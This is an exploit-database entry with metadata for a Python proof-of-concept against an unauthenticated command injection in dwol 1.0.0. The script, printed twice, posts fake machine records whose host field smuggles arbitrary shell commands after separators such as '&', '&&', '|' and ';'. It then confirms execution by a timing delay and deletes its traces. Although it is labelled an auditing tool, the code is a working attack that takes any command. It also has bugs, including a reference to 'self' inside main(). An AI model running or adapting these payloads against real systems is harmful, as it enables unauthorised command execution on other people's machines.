📄 dwol 1.0.0 Command Injection_PACKETSTORM:222361

Description

This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol. It interacts with the target application's API to register test machines and inject controlled payloads into the host...

Visit Original Source

Basic Information

ID PACKETSTORM:222361

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : dwol v1.0.0 Unauthenticated Command Injection Auditor and Verification Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip |
==================================================================================================================================

[+] Summary : This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol.
It interacts with the target application's API to register test machines and inject controlled payloads into the host parameter to determine
whether arbitrary operating system commands can be executed without authentication.

[+] POC :

#!/usr/bin/env python3

import sys
import time
import json
import random
import string
import requests
import argparse
import urllib3
from typing import Dict, List, Optional, Tuple
from datetime import datetime
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class DWOExploit:
"""Software-enhanced version for smart security scanning and verification, and automatic cleaning."""

def __init__(self, target: str, verbose: bool = False,
callback_host: Optional[str] = None,
callback_port: int = 4444):
self.target = target.rstrip('/')
self.verbose = verbose
self.callback_host = callback_host
self.callback_port = callback_port

self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) DWOL-Logic-Fixed/2.0',
'Content-Type': 'application/json'
})

self.api_machines = f"{self.target}/api/machines"
self.api_status = f"{self.target}/api/status"
self.created_machines = []

def _log(self, message: str, level: str = "INFO"):
timestamp = datetime.now().strftime("%H:%M:%S")
symbols = {"ERROR": "✗", "SUCCESS": "✓", "WARNING": "!", "COMMAND": "$", "INFO": "*"}
print(f"[{timestamp}] [{symbols.get(level, '*')}] {message}")

def _generate_machine_id(self) -> str:
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))

def _generate_random_mac(self) -> str:
return ':'.join(['%02x' % random.randint(0, 255) for _ in range(6)])

def _get_time_payloads(self, command: str, os_type: str) -> List[str]:
"""Logical fix 3: Separate payloads and dynamically prepare the text structure in a unique way"""
if os_type == "windows":
return [
f"127.0.0.1 & {command}",
f"127.0.0.1 && {command}",
f"127.0.0.1 | {command}",
f"127.0.0.1 & cmd /c {command}"
]
else:
return [
f"127.0.0.1 ; {command}",
f"127.0.0.1 && {command}",
f"127.0.0.1 | {command}",
f"127.0.0.1 & {command}"
]

def add_machine(self, machine_id: str, name: str, mac: str, host: str, port: int = 9) -> bool:
payload = {
"id": machine_id,
"name": name,
"mac": mac,
"host": host,
"port": port
}
try:
if self.verbose:
self._log(f"Sending registration payload with host config: {host}", "INFO")
response = self.session.post(self.api_machines, json=payload, timeout=10)
if response.status_code in [200, 201]:
self.created_machines.append(machine_id)
return True
return False
except requests.RequestException as e:
self._log(f"Connection failed during node creation: {e}", "ERROR")
return False

def trigger_command(self, expected_delay: int = 0) -> Tuple[bool, float]:
"""Logical fix 2: Monitor response and measure time difference with extreme precision."""
start_time = time.time()
try:

response = self.session.get(self.api_status, timeout=expected_delay + 5)
elapsed = time.time() - start_time

if response.status_code == 200:
if expected_delay > 0 and elapsed >= expected_delay:
return True, elapsed
return True, elapsed
return False, elapsed
except requests.exceptions.Timeout:
elapsed = time.time() - start_time
return True, elapsed
except requests.RequestException:
return False, 0.0

def execute_single_payload(self, base_command: str, os_type: str, delay_check: int = 0) -> bool:
"""Logical fix 1: Test payloads one by one with actual verification of success"""
payloads = self._get_time_payloads(base_command, os_type)

for idx, encoded_host in enumerate(payloads):
machine_id = self._generate_machine_id()
name = f"audit_node_{machine_id}"
mac = self._generate_random_mac()

self._log(f"Attempting injection methodology #{idx + 1}...")

if self.add_machine(machine_id, name, mac, encoded_host):
success, duration = self.trigger_command(expected_delay=delay_check)
self.cleanup_single(machine_id)

if success:
if delay_check > 0 and duration < delay_check:

continue
self._log(f"Successful execution verification confirmed via pattern #{idx + 1}! (Duration: {duration:.2f}s)", "SUCCESS")
return True
time.sleep(0.5)

return False

def cleanup_single(self, machine_id: str):
"""Instant automatic cleaning of log residues"""
try:
self.session.delete(f"{self.api_machines}/{machine_id}", timeout=5)
if machine_id in self.created_machines:
self.created_machines.remove(machine_id)
except requests.RequestException:
pass

def cleanup_all(self):
if not self.created_machines:
self._log("No lingering remote tracking configurations found. Environment clean.", "SUCCESS")
return
self._log(f"Cleaning up {len(self.created_machines)} registered active verification sessions...")
for mid in list(self.created_machines):
self.cleanup_single(mid)

def main():
parser = argparse.ArgumentParser(description="dwol v1.0.0 - Unauthenticated Command Injection Structural Auditor")
parser.add_argument("-t", "--target", required=True, help="Target instance URL (e.g., http://192.168.1.100:999)")
parser.add_argument("-c", "--command", help="Custom command string to deploy during audit context")
parser.add_argument("--os", choices=['windows', 'linux'], default='windows', help="Target OS platform deployment (default: windows)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose trace metrics")

args = parser.parse_args()

exploit = DWOExploit(target=args.target, verbose=args.verbose)

try:
if args.command:
self._log(f"Deploying operational test for command: {args.command}")
exploit.execute_single_payload(args.command, args.os)
else:
exploit._log("No customized execution argument detected. Launching time-delay integrity audit...")
delay_target = 5
audit_cmd = f"ping -n {delay_target + 1} 127.0.0.1" if args.os == "windows" else f"sleep {delay_target}"

is_vuln = exploit.execute_single_payload(audit_cmd, args.os, delay_check=delay_target)

print("\n" + "=" * 60)
if is_vuln:
exploit._log("AUDIT REPORT: System is highly vulnerable to unauthenticated input serialization manipulation.", "ERROR")
else:
exploit._log("AUDIT REPORT: Target node parameters handled the injection sequences structurally.", "SUCCESS")
print("=" * 60 + "\n")

except KeyboardInterrupt:
exploit._log("Operation aborted by user request.", "WARNING")
finally:
exploit.cleanup_all()

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-01T18:14:48",
    "description": "This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol. It interacts with the target application's API to register test machines and inject controlled payloads into the host...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 dwol 1.0.0 Command Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222361",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : dwol v1.0.0 Unauthenticated Command Injection Auditor and Verification Tool                                      |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip                                                |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol. \n                     It interacts with the target application's API to register test machines and inject controlled payloads into the host parameter to determine \n    \t\t\t\t whether arbitrary operating system commands can be executed without authentication.\n    \t\t\t\t \n    [+] POC        : \n    \n    #!/usr/bin/env python3\n    \n    import sys\n    import time\n    import json\n    import random\n    import string\n    import requests\n    import argparse\n    import urllib3\n    from typing import Dict, List, Optional, Tuple\n    from datetime import datetime\n    from urllib.parse import urlparse\n    \n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    \n    \n    class DWOExploit:\n        \"\"\"Software-enhanced version for smart security scanning and verification, and automatic cleaning.\"\"\"\n        \n        def __init__(self, target: str, verbose: bool = False, \n                     callback_host: Optional[str] = None, \n                     callback_port: int = 4444):\n            self.target = target.rstrip('/')\n            self.verbose = verbose\n            self.callback_host = callback_host\n            self.callback_port = callback_port\n            \n            self.session = requests.Session()\n            self.session.headers.update({\n                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) DWOL-Logic-Fixed/2.0',\n                'Content-Type': 'application/json'\n            })\n            \n            self.api_machines = f\"{self.target}/api/machines\"\n            self.api_status = f\"{self.target}/api/status\"\n            self.created_machines = []\n            \n        def _log(self, message: str, level: str = \"INFO\"):\n            timestamp = datetime.now().strftime(\"%H:%M:%S\")\n            symbols = {\"ERROR\": \"\u2717\", \"SUCCESS\": \"\u2713\", \"WARNING\": \"!\", \"COMMAND\": \"$\", \"INFO\": \"*\"}\n            print(f\"[{timestamp}] [{symbols.get(level, '*')}] {message}\")\n            \n        def _generate_machine_id(self) -> str:\n            return ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))\n            \n        def _generate_random_mac(self) -> str:\n            return ':'.join(['%02x' % random.randint(0, 255) for _ in range(6)])\n    \n        def _get_time_payloads(self, command: str, os_type: str) -> List[str]:\n            \"\"\"Logical fix 3: Separate payloads and dynamically prepare the text structure in a unique way\"\"\"\n            if os_type == \"windows\":\n                return [\n                    f\"127.0.0.1 & {command}\",\n                    f\"127.0.0.1 && {command}\",\n                    f\"127.0.0.1 | {command}\",\n                    f\"127.0.0.1 & cmd /c {command}\"\n                ]\n            else:\n                return [\n                    f\"127.0.0.1 ; {command}\",\n                    f\"127.0.0.1 && {command}\",\n                    f\"127.0.0.1 | {command}\",\n                    f\"127.0.0.1 & {command}\"\n                ]\n    \n        def add_machine(self, machine_id: str, name: str, mac: str, host: str, port: int = 9) -> bool:\n            payload = {\n                \"id\": machine_id,\n                \"name\": name,\n                \"mac\": mac,\n                \"host\": host,\n                \"port\": port\n            }\n            try:\n                if self.verbose:\n                    self._log(f\"Sending registration payload with host config: {host}\", \"INFO\")\n                response = self.session.post(self.api_machines, json=payload, timeout=10)\n                if response.status_code in [200, 201]:\n                    self.created_machines.append(machine_id)\n                    return True\n                return False\n            except requests.RequestException as e:\n                self._log(f\"Connection failed during node creation: {e}\", \"ERROR\")\n                return False\n    \n        def trigger_command(self, expected_delay: int = 0) -> Tuple[bool, float]:\n            \"\"\"Logical fix 2: Monitor response and measure time difference with extreme precision.\"\"\"\n            start_time = time.time()\n            try:\n    \n                response = self.session.get(self.api_status, timeout=expected_delay + 5)\n                elapsed = time.time() - start_time\n                \n                if response.status_code == 200:\n                    if expected_delay > 0 and elapsed >= expected_delay:\n                        return True, elapsed\n                    return True, elapsed\n                return False, elapsed\n            except requests.exceptions.Timeout:\n                elapsed = time.time() - start_time\n                return True, elapsed\n            except requests.RequestException:\n                return False, 0.0\n    \n        def execute_single_payload(self, base_command: str, os_type: str, delay_check: int = 0) -> bool:\n            \"\"\"Logical fix 1: Test payloads one by one with actual verification of success\"\"\"\n            payloads = self._get_time_payloads(base_command, os_type)\n            \n            for idx, encoded_host in enumerate(payloads):\n                machine_id = self._generate_machine_id()\n                name = f\"audit_node_{machine_id}\"\n                mac = self._generate_random_mac()\n                \n                self._log(f\"Attempting injection methodology #{idx + 1}...\")\n                \n                if self.add_machine(machine_id, name, mac, encoded_host):\n                    success, duration = self.trigger_command(expected_delay=delay_check)\n                    self.cleanup_single(machine_id)\n                    \n                    if success:\n                        if delay_check > 0 and duration < delay_check:\n                       \n                            continue\n                        self._log(f\"Successful execution verification confirmed via pattern #{idx + 1}! (Duration: {duration:.2f}s)\", \"SUCCESS\")\n                        return True\n                time.sleep(0.5)\n                \n            return False\n    \n        def cleanup_single(self, machine_id: str):\n            \"\"\"Instant automatic cleaning of log residues\"\"\"\n            try:\n                self.session.delete(f\"{self.api_machines}/{machine_id}\", timeout=5)\n                if machine_id in self.created_machines:\n                    self.created_machines.remove(machine_id)\n            except requests.RequestException:\n                pass\n    \n        def cleanup_all(self):\n            if not self.created_machines:\n                self._log(\"No lingering remote tracking configurations found. Environment clean.\", \"SUCCESS\")\n                return\n            self._log(f\"Cleaning up {len(self.created_machines)} registered active verification sessions...\")\n            for mid in list(self.created_machines):\n                self.cleanup_single(mid)\n    \n    \n    def main():\n        parser = argparse.ArgumentParser(description=\"dwol v1.0.0 - Unauthenticated Command Injection Structural Auditor\")\n        parser.add_argument(\"-t\", \"--target\", required=True, help=\"Target instance URL (e.g., http://192.168.1.100:999)\")\n        parser.add_argument(\"-c\", \"--command\", help=\"Custom command string to deploy during audit context\")\n        parser.add_argument(\"--os\", choices=['windows', 'linux'], default='windows', help=\"Target OS platform deployment (default: windows)\")\n        parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Enable verbose trace metrics\")\n        \n        args = parser.parse_args()\n        \n        exploit = DWOExploit(target=args.target, verbose=args.verbose)\n        \n        try:\n            if args.command:\n                self._log(f\"Deploying operational test for command: {args.command}\")\n                exploit.execute_single_payload(args.command, args.os)\n            else:\n                exploit._log(\"No customized execution argument detected. Launching time-delay integrity audit...\")\n                delay_target = 5\n                          audit_cmd = f\"ping -n {delay_target + 1} 127.0.0.1\" if args.os == \"windows\" else f\"sleep {delay_target}\"\n                \n                is_vuln = exploit.execute_single_payload(audit_cmd, args.os, delay_check=delay_target)\n                \n                print(\"\\n\" + \"=\" * 60)\n                if is_vuln:\n                    exploit._log(\"AUDIT REPORT: System is highly vulnerable to unauthenticated input serialization manipulation.\", \"ERROR\")\n                else:\n                    exploit._log(\"AUDIT REPORT: Target node parameters handled the injection sequences structurally.\", \"SUCCESS\")\n                print(\"=\" * 60 + \"\\n\")\n                \n        except KeyboardInterrupt:\n            exploit._log(\"Operation aborted by user request.\", \"WARNING\")\n        finally:\n            exploit.cleanup_all()\n    \n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222361",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222361/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply